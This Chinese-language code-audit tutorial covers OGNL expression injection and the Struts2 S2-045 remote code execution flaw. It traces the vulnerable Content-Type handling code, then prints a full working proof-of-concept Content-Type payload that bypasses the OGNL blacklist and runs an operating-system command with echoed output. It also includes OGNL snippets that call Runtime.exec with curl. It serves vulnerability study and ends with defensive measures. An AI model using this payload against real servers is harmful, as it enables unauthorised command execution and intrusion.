Java代码审计系列(三)：OGNL表达式注入与S2-045漏洞分析<\/h1>

1. OGNL表达式基础<\/h2>

1.1 什么是OGNL<\/h3>

OGNL(Object-Graph Navigation Language)是一种功能强大的表达式语言，用于获取和设置Java对象的属性。它提供了更高抽象度的语法来导航Java对象图。<\/p>

主要特点：<\/p>

简洁的语法完成Java对象导航<\/li>
通过"路径"访问对象信息，而非直接使用get\/set方法<\/li>

可以完成列表映射和选择等操作<\/li> <\/ul>

1.2 OGNL三要素<\/h3>

表达式<\/strong>：最重要的部分，告诉OGNL需要执行什么操作<\/li>
ROOT对象<\/strong>：OGNL操作的目标对象<\/li>

上下文环境<\/strong>：限定操作执行的环境，是一个MAP结构<\/li> <\/ol>
1.3 OGNL基本语法<\/h3>

访问上下文环境参数：表达式前加#<\/code><\/li>
访问静态变量\/调用静态方法：@[class]@[field\/method()]<\/code><\/li>
构造任意对象：直接使用已知对象的构造方法<\/li> <\/ul> 1.4 OGNL执行命令示例<\/h3> \/\/ 方式一：使用Ognl.getValue <\/span><\/span><\/span><\/span>Ognl.<\/span>getValue<\/span>(<\/span>"@java.lang.Runtime@getRuntime().exec('curl http:\/\/127.0.0.1:10000\/')"<\/span>,<\/span> <\/span><\/span> context,<\/span> context.<\/span>getRoot<\/span>());<\/span> <\/span><\/span> <\/span><\/span>\/\/ 方式二：使用Ognl.setValue <\/span><\/span><\/span><\/span>Ognl.<\/span>setValue<\/span>(<\/span>Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>"curl http:\/\/127.0.0.1:10000\/"<\/span>),<\/span> <\/span><\/span> context,<\/span> context.<\/span>getRoot<\/span>());<\/span> <\/span><\/span><\/code><\/pre>2. S2-045漏洞分析<\/h2> 2.1 漏洞背景<\/h3> S2-045是Struts2框架中的一个远程代码执行漏洞，源于Jakarta文件上传组件对Content-Type头的错误处理，导致OGNL表达式注入。<\/p> 2.2 漏洞触发流程<\/h3> 请求封装<\/strong>：<\/p> PrepareOperations.wrapRequest()<\/code>将HTTP请求封装成对象<\/li> 检查Content-Type是否包含"multipart\/form-data"<\/li> <\/ul> <\/li> 异常触发<\/strong>：<\/p> 当Content-Type不以"multipart\/"开头时，抛出InvalidContentTypeException<\/code><\/li> 异常信息中包含用户可控的Content-Type内容<\/li> <\/ul> <\/li> OGNL解析<\/strong>：<\/p> 异常信息被传递到LocalizedTextUtil.findText()<\/code><\/li> 最终到达TextParseUtil.translateVariables()<\/code><\/li> 恶意OGNL表达式被执行<\/li> <\/ul> <\/li> <\/ol> 2.3 关键代码分析<\/h3> \/\/ Dispatcher.wrapRequest() 检查Content-Type <\/span><\/span><\/span><\/span>String content_type =<\/span> request.<\/span>getContentType<\/span>();<\/span> <\/span><\/span>if<\/span> (<\/span>content_type !=<\/span> null<\/span> &&<\/span> content_type.<\/span>contains<\/span>(<\/span>"multipart\/form-data"<\/span>))<\/span> {<\/span> <\/span><\/span> \/\/ 处理multipart请求 <\/span><\/span><\/span><\/span>}<\/span> else<\/span> {<\/span> <\/span><\/span> \/\/ 其他请求处理 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ FileItemIteratorImpl 验证Content-Type格式 <\/span><\/span><\/span><\/span>if<\/span> (<\/span>null<\/span> !=<\/span> contentType &&<\/span> !<\/span>contentType.<\/span>toLowerCase<\/span>(<\/span>Locale.<\/span>ENGLISH<\/span>).<\/span>startsWith<\/span>(<\/span>"multipart\/"<\/span>))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> FileUploadBase.<\/span>InvalidContentTypeException<\/span>(...);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>\/\/ TextParseUtil.translateVariables() 解析OGNL <\/span><\/span><\/span><\/span>String lookupChars =<\/span> open +<\/span> "{"<\/span>;<\/span> <\/span><\/span>while<\/span> (<\/span>true<\/span>)<\/span> {<\/span> <\/span><\/span> int<\/span> start =<\/span> expression.<\/span>indexOf<\/span>(<\/span>lookupChars,<\/span> pos);<\/span> <\/span><\/span> \/\/ 解析并执行OGNL表达式 <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3. 漏洞利用分析<\/h2> 3.1 典型POC<\/h3> Content-Type: %{ (#nike='multipart\/form-data'). (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS). (#memberAccess?(#memberAccess=#dm):( (#container=#context['com.opensymphony.xwork2.ActionContext.container']). (#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)) )). (#cmd='"whoami"'). (#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))). (#cmds=(#iswin?{'cmd.exe','\/c',#cmd}:{'\/bin\/bash','-c',#cmd})). (#p=new java.lang.ProcessBuilder(#cmds)). (#p.redirectErrorStream(true)). (#process=#p.start()). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())). (@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)). (#ros.flush()) }; <\/code><\/pre> 3.2 POC解析<\/h3> 绕过黑名单<\/strong>：<\/p> Struts2默认黑名单包含java.lang.Runtime<\/code>等危险类<\/li> POC先获取DEFAULT_MEMBER_ACCESS<\/code><\/li> 通过getInstance<\/code>实例化OgnlUtil<\/code><\/li> 清除黑名单(excludedPackageNames<\/code>和excludedClasses<\/code>)<\/li> 使用setMemberAccess<\/code>覆盖原有设置<\/li> <\/ul> <\/li> 命令执行<\/strong>：<\/p> 检测操作系统类型<\/li> 根据系统类型构造相应命令<\/li> 创建ProcessBuilder<\/code>执行命令<\/li> 获取响应输出流回显结果<\/li> <\/ul> <\/li> <\/ol> 3.3 黑名单机制<\/h3> Struts2在struts-default.xml<\/code>中定义的黑名单：<\/p> <constant<\/span> name=<\/span>"struts.excludedClasses"<\/span> <\/span><\/span> value=<\/span>"java.lang.Object, java.lang.Runtime, java.lang.System, java.lang.Class, <\/span><\/span><\/span> java.lang.ClassLoader, java.lang.Shutdown, java.lang.ProcessBuilder, <\/span><\/span><\/span> ognl.OgnlContext, ognl.ClassResolver, ognl.TypeConverter, ognl.MemberAccess, <\/span><\/span><\/span> ognl.DefaultMemberAccess, com.opensymphony.xwork2.ognl.SecurityMemberAccess, <\/span><\/span><\/span> com.opensymphony.xwork2.ActionContext"<\/span>\/><\/span> <\/span><\/span> <\/span><\/span><constant<\/span> name=<\/span>"struts.excludedPackageNames"<\/span> <\/span><\/span> value=<\/span>"java.lang.,ognl,javax,freemarker.core,freemarker.template"<\/span>\/><\/span> <\/span><\/span><\/code><\/pre>4. 环境搭建与调试<\/h2> 4.1 环境准备<\/h3> 使用Docker搭建漏洞环境<\/li> IDEA导入Maven项目<\/li> 配置远程调试<\/li> <\/ol> 4.2 调试技巧<\/h3> 关键断点设置：<\/p> PrepareOperations.wrapRequest()<\/code><\/li> Dispatcher.wrapRequest()<\/code><\/li> FileItemIteratorImpl<\/code>构造函数<\/li> TextParseUtil.translateVariables()<\/code><\/li> <\/ul> <\/li> 调试流程：<\/p> 跟踪Content-Type处理流程<\/li> 观察异常抛出和传递<\/li> 监控OGNL表达式解析过程<\/li> <\/ul> <\/li> <\/ol> 5. 防御措施<\/h2> 升级Struts2到最新安全版本<\/li> 禁用危险的OGNL表达式功能<\/li> 加强输入验证，特别是Content-Type头<\/li> 实施严格的黑名单机制<\/li> 使用Web应用防火墙(WAF)拦截恶意请求<\/li> <\/ol> 6. 总结<\/h2> S2-045漏洞展示了框架设计中的安全风险：<\/p> 异常处理流程中的安全隐患<\/li> 表达式注入的威力<\/li> 黑名单机制的局限性<\/li> <\/ul> 通过分析此漏洞，安全研究人员可以：<\/p> 深入理解OGNL表达式注入原理<\/li> 掌握Struts2框架的内部工作机制<\/li> 学习复杂漏洞的利用技巧<\/li> 提高代码审计能力<\/li> <\/ol>